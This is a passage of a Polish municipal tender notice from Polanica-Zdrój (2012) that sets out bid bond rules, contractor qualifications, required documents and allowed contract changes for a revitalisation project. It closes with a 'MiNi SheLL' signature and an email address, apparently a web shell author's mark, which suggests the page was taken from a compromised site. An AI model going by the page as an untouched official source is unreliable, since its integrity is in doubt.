9.Roboty instalacyjne wodne i kanalizacyjne
a) rurociągi z PCV kanalizacyjne o śr. 75 mm na ścianach  z demontażu  8, 00 m

Załącznik nr 1 G - Dąbrowskiego 1 G 
a)Kosztorys ofertowy (do wypełnienia) wraz z przedmiarem robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.21.00-2, 45.10.00.00-8, 45.31.12.00-2, 45.26.25.00-6, 45.41.00.00-4, 45.44.21.00-8, 45.33.20.00-3, 45.26.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium należy wnieść w wysokości 29.000,0  zł  PLN(słownie: dwadzieścia dziewięć tysięcy złotych, 00/100 groszy) PLN w terminie do dnia 20.04.2012r. do godziny 10:00. 
2. Wadium może być wnoszone:
1) w pieniądzu  przelewem na konto depozytowe Gminy PolanicaZdrój BANK PEKAO S.A. Oddział w Polanicy-Zdroju  nr 34 1240 3464 1111 0010 3997 8269 z dopiskiem Rewitalizacja Obszaru Miejskiego w Polanicy Zdróju
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej
(z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości .
3. Wadium może być wniesione w jednej lub kilku formach.
4. W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji
ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1) zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt 7 bez potwierdzania tych okoliczności,
2) termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
3) miejsce i termin zwrotu gwarancji.
5. Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym.
6. Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie
przez zamawiającego wykluczony a jego oferta odrzucona.
7. Zamawiający zatrzymuje wadium wraz z odsetkami w sytuacji, gdy
1) wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) spowodował, że zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po jego Wykonawcy,
2) wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw. Zamawiający zwróci wadium jeśli wykonawca udowodni, że nastąpiło to z przyczyn nieleżących po jego stronie.
8. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a ustawy PZP).
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę
przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 8, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12. Jeżeli wadium zostanie wniesione w pieniądzu zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
13. W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić wadium lub dołączyć do oferty upoważnienie do odbioru wadium przez wskazaną osobę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wskazać do wykonania niniejszego zamówienia następujące osoby:
Kierownik budowy - niniejsza osoba ma posiadać następujące kwalifikacje: inżynier z uprawnieniami do kierowania robotami w specjalności konstrukcyjno - budowlanej lub odpowiadającymi im ważnymi uprawnieniami budowlanymi (w zakresie robót, które są przedmiotem zamówienia i za które będzie on odpowiedzialny), które zostały wydane na podstawie wcześniej obowiązujących przepisów, min. 4 lat doświadczenia w robotach z zakresu robót budowlanych w zakresie przedmiotu zamówienia, w tym min. 2 lat jako kierownik budowy;
Kierownik robót elektrycznych - niniejsza osoba ma posiadać  następujące kwalifikacje: inżynier z uprawnieniami do kierowania robotami w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  elektrycznych lub odpowiadającymi im ważnymi uprawnieniami budowlanymi (w  zakresie robót, które są przedmiotem zamówienia i za które będzie on  odpowiedzialny), które zostały wydane na podstawie wcześniej obowiązujących  przepisów, min. 4 lata doświadczenia w robotach z zakresu sieci elektro - energetycznych, w tym min. 2 lata jako kierownik budowy lub robót,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonać w okresie ostatnich pięciu lat przed upływem składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, roboty podobne do robót stanowiących przedmiot niniejszego zamówienia tj. co najmniej 3 (trzy) zamówienia na roboty  odpowiadające opisowi przedmiotu zamówienia zawartego w rozdziale II SIWZ, z tym, że każde z zamówień powinno mieć wartość robót co najmniej 150.000,00 PLN (brutto).
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych  informacja na temat doświadczenia, wykaz zrealizowanych prac stanowiących przedmiot zamówienia, sporządzony według wzoru stanowiącego Załącznik Nr 5 do niniejszej SWIZ oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie,
wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty, których dokumenty dotyczą,
wskazanie podmiotu, na rzecz którego zrealizowane były roboty (Nazwa i adres inwestora),
wskazanie zakresu robót, (przedmiot i tytuł zamówienia)
wskazanie wartości robót,(całkowita wartość zamówienia
wskazanie daty wykonania (rozpoczęcia i zakończenia),
opinię podmiotu, na rzecz którego realizowane były roboty stwierdzającą, że roboty zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować  potencjałem technicznym, wykonawca przedkłada wykaz sprzętu technicznego zgodnie z Załącznikiem nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć wykaz osób, którymi dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz (informacje te mogą być przedstawione w formie życiorysu zawodowego) sporządzony według wzoru stanowiącego Załącznik Nr 6 do SIWZ oraz oświadczenia, że osoby, które będą uczestniczyć w  wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Jeżeli w wykazie osób Wykonawca wskaże osoby, którymi będzie dysponował to zobligowany jest do złożenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku):posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 500.000,00 zł. PLN.

W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem składania ofert, potwierdzającą posiadanie przez Wykonawcę środków finansowych lub posiadanie zdolności 
kredytowej łącznie w wymaganej wysokości ;
l)posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej na kwotę minimum  500.000,00 zł PLN.   
W celu potwierdzenia spełniania niniejszego warunku Wykonawca przedkłada potwierdzenie opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia do Umowy mogą nastąpić za zgodą obu stron i wymagają aneksu w formie pisemnej pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych.
2.W przypadku, kiedy zmiana nie będzie powodowała zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy Strony mogą dokonywać zmian bez ograniczeń
3.Zamawiający przewiduje możliwość zmiany Umowy w stosunku do treści oferty w następującym zakresie: 
a)terminu realizacji Przedmiotu Umowy, gdy zaistnieje przerwa w realizacji zamówienia z przyczyn niezależnych od Wykonawcy, wystąpienia zdarzenia losowego lub siły wyższej albo warunków atmosferycznych uniemożliwiających realizację przedmiotu umowy,
b)terminu realizacji Przedmiotu Umowy oraz innych zmian umowy w wypadku zajścia okoliczności, które nie były znane w chwili zawarcia Umowy lub w wypadku wystąpienia okoliczności niezależnych od stron, a których nie można było przewidzieć w chwili zawarcia Umowy,
c)zmiany wynagrodzenia Wykonawcy i zmian zasad płatności tego wynagrodzenia w sytuacji, kiedy konieczność wprowadzenia zmian wynika z okoliczności, które nie były znane w chwili zawarcia Umowy lub zmiany te są korzystne dla Zamawiającego,.
d)zmian sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie lub wytycznych dotyczących ich realizacji,
e)zmian związanych z rezygnacją przez Zamawiającego z realizacji części/całości Przedmiotu Umowy spowodowanych okolicznościami niezależnymi od Zamawiającego, a nieznanymi w chwili zawarcia Umowy ,
f)gdy niezbędna jest zmiana sposobu wykonania Umowy, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania Umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:bip.polanica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http:bip.polanica.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 10:00, miejsce: 1.Ofertę należy złożyć w Gminie Polanica-Zdrój ; z/s 57-320 Polanica-Zdrój   ul. Jarosława Dąbrowskiego 3  pok. 16 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Rewitalizacja Obszaru Miejskiego w Polanicy-Zdroju, projet realizowany w ramach Działania nr 9.2 Wsparcie dla przedsięwzięć w zakresie mieszkalnictwa w miastach poniżej 10 tysięcy mieszkańców, Priorytet nr 9 RPO WD..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com